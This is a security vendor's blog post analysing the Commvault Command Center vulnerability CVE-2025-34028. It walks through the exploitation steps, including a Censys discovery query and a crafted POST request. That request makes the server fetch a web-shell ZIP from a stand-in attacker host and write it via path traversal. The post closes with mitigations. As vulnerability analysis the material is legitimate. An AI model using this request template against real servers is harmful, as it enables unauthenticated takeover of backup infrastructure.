In April 2025, a critical pre-auth Remote Code Execution vulnerability, CVE-2025-34028, was discovered in Commvault Command Center. This vulnerability allows attackers to achieve remote code execution without authentication by exploiting an Server-Side Request forgery (SSRF) and a path traversal issue that enables uploading and executing malicious ZIP files. With a CVSS score of 10.0, this vulnerability poses a risk to organizations using affected versions of Commvault Command Center. CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on May 2nd.
In this blog, we’ll explore the details of CVE-2025-34028, how attackers can exploit it, and the steps organizations can take to mitigate this critical issue.
What is Commvault ?
Commvault is an enterprise data protection and management platform used by major organizations worldwide. It offers reliable backup and recovery for servers, databases, VMs, cloud resources, and endpoints. Built-in disaster recovery ensures business continuity with features like replication and automated failover. It also handles data archiving, retention, and compliance across the data lifecycle. With strong cloud integration and automation, Commvault simplifies complex data management tasks.
What Is CVE-2025-34028?
CVE-2025-34028 is a pre-authentication remote code execution vulnerability in Commvault Command Center, caused by improper validation of user inputs in the deployWebpackage.do endpoint. The vulnerability allows attackers to chain together server-side request forgery (SSRF) and path traversal vulnerabilities to upload and execute malicious files on the server.
Key Details:
- Severity: Critical (CVSS 10.0)
- Affected Systems: Commvault Command Center Innovation Release versions 11.38.0 through 11.38.19 on both Windows and Linux platforms
- Exploitation: Attackers can craft a malicious request to exploit SSRF and path traversal vulnerabilities, uploading and executing arbitrary code with system privileges
Status: Added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 2, 2025
Exploiting CVE-2025-34028 Step-By-Step
Step 1: Identifying Vulnerable Commvault Command Center Instances
Attackers can use Shodan or Censys to find publicly accessible Commvault Command Center instances.
Censys query to find Commvault Command Center instances:
host.services:(cert.parsed.issuer.common_name={“COMMVAULT”, “cv2″} or endpoints.http.headers:(key:”Location” and value:”/commandcenter/”) or endpoints.http.headers:(key:”Server” and value:”Commvault WebServer”) or endpoints.http.html_title={“Command Center”, “Comvault®”} or endpoints.http.uri:”/commandcenter/” or cert.parsed.subject.organization=”CommVault Systems, Inc.”)
As of writing this blog we found approx. 1400+ Instances on Censys.
Note: Not all exposed instances are necessarily vulnerable to CVE-2025-34028, as this affects only Innovation Release versions 11.38.0-11.38.19
Step 2: Crafting the Malicious Request
Once attackers identify vulnerable Command Center instances, they prepare a malicious ZIP file containing a web shell and host it on an attacker-controlled server. They then craft a specially crafted request to the vulnerable endpoint:
“`
POST /commandcenter/deployWebpackage.do HTTP/1.1
Host: <target ip>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
commcellName=attacker-server.com&servicePack=../../Reports/MetricsUpload/shell/&version=exploit
“`
The exploitation of CVE-2025-34028 involves chaining multiple vulnerabilities together:
Step 3: Server-Side Request Forgery (SSRF)
The Commvault server processes the request and attempts to connect to the attacker-controlled server specified in the commcellName parameter to download what it believes is a legitimate package:
“`
HttpGet request = new HttpGet(“https://” + commcellName + “/commandcenter/webpackage.do”);
request.addHeader(“Accept”, “application/octet-stream”);
CloseableHttpResponse response = client.execute(request);
“`
Step 4: Path Traversal Exploitation
The Commvault server uses the servicePack parameter, which contains path traversal sequences (../../), to determine where to save and extract the downloaded file:
“`
String confPath = BASE_PATH + File.separator + “Apache” + File.separator + “conf” + File.separator + “ccPackages” + File.separator;
File confDirectory = this.createDirectory(confPath + servicePack);
“`
Without proper validation, the path traversal allows the attacker to escape the intended directory and place files in a web-accessible location.
Step 5: ZIP Extraction and Code Execution
The server downloads the malicious ZIP file from the attacker’s server and extracts it to the path specified by the attacker:
“`
FileOutputStream fos = new FileOutputStream(new File(confDirectory, “dist-cc.zip”));
// … code to write the ZIP file …
this.deployCCPackage(servicePack);
“`
The deployCCPackage() method extracts the ZIP file, placing the attacker’s web shell in a location accessible via the web server:
“`
this.fileZipUtil.unzipFileWrtAbsPath(CC_DEPLOY_PATH + servicePack + File.separator + “dist-cc.zip”, DIST_CC_PATH + TEMP_DIR);
“`
Step 6: Accessing the Web Shell
After successful exploitation, the attacker can access their web shell at a URL like:
https://<target>/reports/MetricsUpload/shell/.tmp/dist-cc/dist-cc/shell.jsp
The web shell executes with the permissions of the Commvault service account, typically SYSTEM on Windows or root on Linux, giving the attacker complete control over the server.
Explanation of the Request:
The following HTTP request demonstrates the exploitation of CVE-2025-34028:
“`
POST /commandcenter/deployWebpackage.do HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
commcellName=attacker-server.com&servicePack=../../Reports/MetricsUpload/shell/&version=exploit
“`
SSRF Vector: The commcellName parameter is used to specify an attacker-controlled server from which the vulnerable application will download a malicious ZIP file.
- Path Traversal: The servicePack parameter contains directory traversal sequences (../../) that allow writing files outside the intended directory.
- Code Execution: The combination allows an attacker to place a malicious JSP web shell in a web-accessible directory, achieving remote code execution.
Automating the exploitation of CVE-2025-34028:
Attackers can use tools like ProjectDiscovery’s Nuclei to automatically scan for and detect vulnerable instances of Commvault Command Center. Security researchers have already published Nuclei templates for CVE-2025-34028 detection.
How To Detect If You Are Vulnerable To Exploited Instances Of CVE-2025-34028?
FireCompass has developed a multi-stage attack tree to detect vulnerable instances of CVE-2025-34028. By leveraging Continuous Automated Red Teaming (CART), FireCompass proactively scans attack surfaces, identifying weaknesses before attackers can exploit them.
FireCompass customers can execute a dedicated module to scan for Commvault Command Center Pre-Authentication RCE (CVE-2025-34028). This ensures that security teams can take swift remediation actions to secure their infrastructure.
>> Want To Know If You Are Vulnerable to CVE-2025-34028?
Mitigation Strategies For CVE-2025-34028
- Update Commvault Command Center: Upgrade to the patched versions:
- Version 11.38.20
- Restrict Access: Isolate the Command Center installation from external network access and implement IP whitelisting for management interfaces.
- Monitor Logs: Review logs for suspicious activity, particularly:
- HTTP POST requests to /commandcenter/deployWebpackage.do
- Unexpected outbound connections from Commvault servers
- Creation of unusual files or directories in web-accessible locations
- Network Segmentation: Ensure that Commvault Command Center is not directly exposed to the internet and is properly segmented from untrusted networks.
Conclusion
CVE-2025-34028 highlights the dangers of inadequate input validation in web applications, especially those handling sensitive operations like file downloads and extraction. By chaining together SSRF and path traversal vulnerabilities, attackers can achieve full system compromise without authentication, putting critical backup infrastructure at risk.
FireCompass continuously scans and detects such vulnerabilities, providing real-time risk assessments and attack surface visibility. Don’t wait for attackers to exploit your systems—stay ahead of attackers with FireCompass Continuous Automated Red Teaming (CART). Get started today.
Rokkam Vamshi, is part of the security research team at FireCompass, specializing in CVE research, attack vectors, and cybersecurity. He is a passionate bug hunter, CTF player, with expertise in web, API, and network security.
Connect with him at LinkedIn.
Related Posts:
